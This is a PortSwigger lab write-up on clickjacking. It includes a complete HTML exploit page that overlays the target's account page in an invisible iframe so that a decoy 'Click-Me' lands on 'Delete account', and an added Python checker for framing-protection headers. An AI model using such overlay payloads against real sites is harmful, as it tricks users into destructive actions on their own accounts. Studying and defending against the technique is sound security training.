Lab 1#: Basic clickjacking with CSRF token protection | Clickjacking Lab
Author: infosecwriteups.com, 2025-11-23 08:27:18

PortSwigger Lab

Mosta

Hey my dear readers, Clickjacking (UI Redressing) is a web attack in which the attacker manipulates the browser UI so that the user clicks on the targeted site without knowing it. Remember: clickjacking is possible if the site does not send an X-Frame-Options header or a CSP frame-ancestors directive in its HTTP response. Today we will solve “Basic clickjacking with CSRF token protection”, where our goal is to trick the victim into performing an action on their account (deleting it).
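To make that note concrete, here is an added example (not part of the original writeup) that evaluates a response's X-Frame-Options header and Content-Security-Policy frame-ancestors directive and reports whether a page from another origin, such as the exploit server, would be allowed to frame it. The header sets are constructed; `lab-id` is the placeholder used later in this writeup, and the exploit-server hostname is an assumption.

```python
"""Decide whether HTTP response headers stop a page from being framed.

Added example, not code from the original writeup. It applies the two
protections the writeup names: CSP frame-ancestors (checked first, since
browsers let it override X-Frame-Options) and X-Frame-Options.
"""
from urllib.parse import urlsplit

# Constructed placeholders: the lab host as written in the writeup and an
# assumed exploit-server host (not taken from the page).
LAB = "https://lab-id.web-security-academy.net"
EXPLOIT_SERVER = "https://exploit-lab-id.exploit-server.net"

# Constructed sample header sets to compare.
SAMPLES = {
    "unprotected (lab as shipped)": {"Content-Type": "text/html"},
    "xfo-deny": {"X-Frame-Options": "DENY"},
    "xfo-sameorigin": {"X-Frame-Options": "SAMEORIGIN"},
    "csp-none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp-self": {"Content-Security-Policy": "frame-ancestors 'self'"},
}


def _csp_frame_ancestors(csp_value):
    """Return the frame-ancestors source list from a CSP value, or None if absent."""
    for directive in csp_value.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.strip("'").lower() for t in tokens[1:]]
    return None


def _source_matches(src, framer_host):
    """Match one CSP host source (with optional scheme or *. wildcard) against a host."""
    host = urlsplit(src if "//" in src else "//" + src).netloc.lower()
    if not host:
        return False
    if host.startswith("*."):
        return framer_host.endswith(host[1:])
    return host == framer_host


def framing_allowed(headers, page_origin, framer_origin):
    """Return (allowed, reason) for framer_origin embedding page_origin.

    headers: dict of header name -> value; names are matched case-insensitively.
    Simplification: multiple or malformed X-Frame-Options values are not
    special-cased the way browsers handle them.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    page_host = urlsplit(page_origin).netloc.lower()
    framer_host = urlsplit(framer_origin).netloc.lower()

    csp = lower.get("content-security-policy")
    if csp is not None:
        sources = _csp_frame_ancestors(csp)
        if sources is not None:
            if "none" in sources:
                return False, "CSP frame-ancestors 'none'"
            if "self" in sources and page_host == framer_host:
                return True, "CSP frame-ancestors 'self' (same origin)"
            for src in sources:
                if src != "self" and _source_matches(src, framer_host):
                    return True, f"CSP frame-ancestors allows {src}"
            return False, "CSP frame-ancestors does not list the framing origin"

    xfo = lower.get("x-frame-options")
    if xfo is not None:
        value = xfo.strip().upper()
        if value == "DENY":
            return False, "X-Frame-Options: DENY"
        if value == "SAMEORIGIN":
            return page_host == framer_host, "X-Frame-Options: SAMEORIGIN"
        # Any other value (including the obsolete ALLOW-FROM) is not enforced
        # by current browsers, so the page is effectively unprotected.
        return True, f"X-Frame-Options value not enforced: {xfo.strip()}"

    return True, "no framing protection header"


def check_samples():
    """Evaluate every constructed sample as the exploit server framing the lab."""
    return {name: framing_allowed(hdrs, LAB, EXPLOIT_SERVER)[0]
            for name, hdrs in SAMPLES.items()}


if __name__ == "__main__":
    for name, hdrs in SAMPLES.items():
        allowed, reason = framing_allowed(hdrs, LAB, EXPLOIT_SERVER)
        print(f"{name:30} frameable={allowed!s:5} ({reason})")
```

Only the first sample (no protection header at all, which is how this lab's page responds) comes back as frameable; every other header set blocks a cross-origin iframe.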


  • First, we log in to the lab and go to the My Account page.
    There are “Update email”, “Delete account” and “Exploit server” buttons there; Delete account is our target.


  • We go to the exploit server and write some HTML code there. This is what will be shown to the victim.


This is your server. You can use the form below to save an exploit, and send it to the victim. Please note that the victim uses Google Chrome. When you test your exploit against yourself, we recommend using Burp’s Browser or Chrome.
  • Here we can use View Exploit to check that our HTML code works as intended, and once we are done writing it, we deliver the exploit to the victim.


<!DOCTYPE html>
<html>
<head>
<style>
/* The target page is loaded in an iframe laid over the decoy text;
   the high z-index keeps it on top while the opacity hides it */
iframe {
position: relative;
width: 1135px;
height: 600px;
opacity: 0.000001; /* makes it invisible */
z-index: 2;
}
/* Decoy elements, positioned so the bait text sits under the Delete account button */
h2 {
position: absolute;
top: 445px;
left: 60px;
z-index: 1;
}
h4 {
position: absolute;
top: 500px;
left: 60px;
z-index: 1;
}
p {
position: absolute;
top: 540px;
left: 170px;
z-index: 1;
}
</style>
</head>
<body>
<h2>I'm not a robot</h2>
<h4>Click-Me</h4>
<p>Privacy-Team</p>
<!-- lab-id stands for your own lab's hostname -->
<iframe src="https://lab-id.web-security-academy.net/my-account"></iframe>
</body>
</html>


For checking the alignment, the opacity was first set to 0.5.
  • Here the victim only sees “I’m not a robot, Click-Me, Privacy-Team”.
  • Reduce the opacity of the iframe to almost zero: it disappears from view, but with the z-index kept it still sits on top.
  • As a result, whenever the victim clicks on the Click-Me text, they are actually clicking the Delete Account button inside the iframe, and the account is deleted.


opacity: 0.000001;
Burp Suite capture: account successfully deleted


When the account is deleted, we get a pop-up message congratulating us that the lab has been solved.


Article source: https://infosecwriteups.com/lab-1-basic-clickjacking-with-csrf-token-protection-clickjacking-lab-ee08bc71b170?source=rss----7b722bfd1b8d---4